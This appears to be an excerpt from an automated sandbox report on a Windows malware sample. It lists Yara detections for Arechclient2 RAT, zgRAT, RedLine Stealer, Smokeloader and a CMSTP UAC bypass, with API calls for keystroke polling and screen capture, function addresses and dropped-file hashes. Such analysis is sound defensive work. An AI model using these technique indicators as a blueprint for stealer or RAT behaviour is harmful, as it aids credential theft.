Code function: 2_2_006AC8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,

2_2_006AC8B0

Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe

Code function: 2_2_6C86A5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

2_2_6C86A5AA

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.cmd.exe.5e100c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 2.2.run.exe.3a2fd5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.cmd.exe.5a000c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 2.2.run.exe.3a2f15b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.cmd.exe.5427976.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.run.exe.3e5286d.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.5472264.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.run.exe.39eb86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.5472e64.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.cmd.exe.5a000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 25.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 17.2.cmd.exe.546b264.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.5e100c8.8.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 15.2.run.exe.3e96d5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.run.exe.3e9615b.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.cmd.exe.546be64.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.542e976.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000000.00000002.1898539579.0000000002F67000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000002.2090299966.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Users\user\AppData\Local\Temp\cqecfsbe, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C02ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	1_2_6C02ED10
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C06B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6C06B700
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C06B8C0 rand_s,NtQueryVirtualMemory,	1_2_6C06B8C0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C06B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	1_2_6C06B910
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C00F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6C00F280
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6CA662C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,	1_2_6CA662C0

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_00427880	0_2_00427880
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0040B8AE	0_2_0040B8AE
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0040C191	0_2_0040C191
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_004051B4	0_2_004051B4
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_004123A0	0_2_004123A0
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0040F441	0_2_0040F441
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0040C44C	0_2_0040C44C
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0042140C	0_2_0042140C
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0040BC20	0_2_0040BC20
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0041BE39	0_2_0041BE39
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0040BECA	0_2_0040BECA
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_00408761	0_2_00408761
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0041B722	0_2_0041B722
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0040C7FC	0_2_0040C7FC
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0315BB15	0_2_0315BB15
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0315C3F8	0_2_0315C3F8
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0315CA63	0_2_0315CA63
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0315C131	0_2_0315C131
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0316B989	0_2_0316B989
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_031589C8	0_2_031589C8
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_03162607	0_2_03162607
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0315BE87	0_2_0315BE87
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0315C6B3	0_2_0315C6B3
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0315F6A8	0_2_0315F6A8
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C0035A0	1_2_6C0035A0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C07AC00	1_2_6C07AC00
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C045C10	1_2_6C045C10
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C052C10	1_2_6C052C10
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C07542B	1_2_6C07542B
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C015440	1_2_6C015440
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C07545C	1_2_6C07545C
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C016C80	1_2_6C016C80
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C0634A0	1_2_6C0634A0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C06C4A0	1_2_6C06C4A0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C0164C0	1_2_6C0164C0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C02D4D0	1_2_6C02D4D0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C00D4E0	1_2_6C00D4E0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C046CF0	1_2_6C046CF0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C01FD00	1_2_6C01FD00
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C030512	1_2_6C030512
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C02ED10	1_2_6C02ED10
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C040DD0	1_2_6C040DD0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C0685F0	1_2_6C0685F0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C055600	1_2_6C055600
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C047E10	1_2_6C047E10
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C069E30	1_2_6C069E30
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C024640	1_2_6C024640
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C052E4E	1_2_6C052E4E
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C029E50	1_2_6C029E50
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C043E50	1_2_6C043E50
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C076E63	1_2_6C076E63
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C00C670	1_2_6C00C670
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C06E680	1_2_6C06E680
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C025E90	1_2_6C025E90
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C064EA0	1_2_6C064EA0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C0776E3	1_2_6C0776E3
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C00BEF0	1_2_6C00BEF0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C01FEF0	1_2_6C01FEF0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C019F00	1_2_6C019F00
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C047710	1_2_6C047710
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C0577A0	1_2_6C0577A0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C00DFE0	1_2_6C00DFE0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C036FF0	1_2_6C036FF0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C017810	1_2_6C017810
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C04B820	1_2_6C04B820
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C054820	1_2_6C054820
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C028850	1_2_6C028850
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C02D850	1_2_6C02D850
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C04F070	1_2_6C04F070
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C0360A0	1_2_6C0360A0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C0750C7	1_2_6C0750C7
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C02C0E0	1_2_6C02C0E0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C0458E0	1_2_6C0458E0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C02A940	1_2_6C02A940
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C01D960	1_2_6C01D960
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C05B970	1_2_6C05B970
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C07B170	1_2_6C07B170
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C045190	1_2_6C045190
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C062990	1_2_6C062990
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C00C9A0	1_2_6C00C9A0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C03D9B0	1_2_6C03D9B0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C049A60	1_2_6C049A60
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C07BA90	1_2_6C07BA90
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C0022A0	1_2_6C0022A0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C034AA0	1_2_6C034AA0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C01CAB0	1_2_6C01CAB0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C072AB0	1_2_6C072AB0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C048AC0	1_2_6C048AC0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C021AF0	1_2_6C021AF0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C04E2F0	1_2_6C04E2F0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C04D320	1_2_6C04D320
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C005340	1_2_6C005340
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C01C370	1_2_6C01C370
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C00F380	1_2_6C00F380
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C0753C8	1_2_6C0753C8
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C93ECD0	1_2_6C93ECD0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C8DECC0	1_2_6C8DECC0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9A6C00	1_2_6C9A6C00
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9BAC30	1_2_6C9BAC30
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C8EAC60	1_2_6C8EAC60
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C976D90	1_2_6C976D90
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C8E4DB0	1_2_6C8E4DB0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6CA6CDC0	1_2_6CA6CDC0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6CA68D20	1_2_6CA68D20
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9AED70	1_2_6C9AED70
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6CA0AD50	1_2_6CA0AD50
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C966E90	1_2_6C966E90
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C8EAEC0	1_2_6C8EAEC0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C980EC0	1_2_6C980EC0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9C0E20	1_2_6C9C0E20
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C97EE70	1_2_6C97EE70
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6CA28FB0	1_2_6CA28FB0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C8EEFB0	1_2_6C8EEFB0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9BEFF0	1_2_6C9BEFF0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C8E0FE0	1_2_6C8E0FE0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6CA20F20	1_2_6CA20F20
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C8E6F10	1_2_6C8E6F10
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C94EF40	1_2_6C94EF40
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9A2F70	1_2_6C9A2F70
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9E68E0	1_2_6C9E68E0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C930820	1_2_6C930820
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C96A820	1_2_6C96A820
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9B4840	1_2_6C9B4840
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9A09B0	1_2_6C9A09B0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9709A0	1_2_6C9709A0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C99A9A0	1_2_6C99A9A0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9149F0	1_2_6C9149F0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9FC9E0	1_2_6C9FC9E0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C936900	1_2_6C936900
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C918960	1_2_6C918960
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C95EA80	1_2_6C95EA80
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C98EA00	1_2_6C98EA00
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C998A30	1_2_6C998A30
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C95CA70	1_2_6C95CA70
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C980BA0	1_2_6C980BA0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9E6BE0	1_2_6C9E6BE0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6CA0A480	1_2_6CA0A480
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9264D0	1_2_6C9264D0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C97A4D0	1_2_6C97A4D0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C96A430	1_2_6C96A430
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C944420	1_2_6C944420
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C8F8460	1_2_6C8F8460
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C8D45B0	1_2_6C8D45B0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C96E5F0	1_2_6C96E5F0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9AA5E0	1_2_6C9AA5E0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C938540	1_2_6C938540
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9E4540	1_2_6C9E4540
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C980570	1_2_6C980570
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6CA28550	1_2_6CA28550
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C942560	1_2_6C942560
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9046D0	1_2_6C9046D0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C93E6E0	1_2_6C93E6E0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C97E6E0	1_2_6C97E6E0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C93C650	1_2_6C93C650
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C90A7D0	1_2_6C90A7D0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C960700	1_2_6C960700
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C8D8090	1_2_6C8D8090
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9BC0B0	1_2_6C9BC0B0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C8F00B0	1_2_6C8F00B0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9A8010	1_2_6C9A8010
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9AC000	1_2_6C9AC000
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C92E070	1_2_6C92E070
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C8E01E0	1_2_6C8E01E0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C956130	1_2_6C956130
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9C4130	1_2_6C9C4130
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C948140	1_2_6C948140
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9AE2B0	1_2_6C9AE2B0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9B22A0	1_2_6C9B22A0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6CA662C0	1_2_6CA662C0
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_00694060	2_2_00694060
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006AF840	2_2_006AF840
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006AB150	2_2_006AB150
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_00692120	2_2_00692120
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006B6130	2_2_006B6130
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006E9A00	2_2_006E9A00
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006DCAA0	2_2_006DCAA0
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006A4390	2_2_006A4390
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006B0390	2_2_006B0390
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006BFC10	2_2_006BFC10
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_0069D570	2_2_0069D570
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006E5550	2_2_006E5550
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006E96E0	2_2_006E96E0
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_0069A6F0	2_2_0069A6F0
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006B66F0	2_2_006B66F0
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006937B0	2_2_006937B0
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_6C944D8F	2_2_6C944D8F
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_6C943D16	2_2_6C943D16
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_6C95371C	2_2_6C95371C
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_6C8BD24D	2_2_6C8BD24D

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: String function: 6C903620 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: String function: 6C03CBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: String function: 6C909B10 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: String function: 6CA609D0 appears 196 times
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: String function: 6C0494D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: String function: 6CA6DAE0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: String function: 6CA6D930 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: String function: 00691930 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: String function: 00819D36 appears 33 times
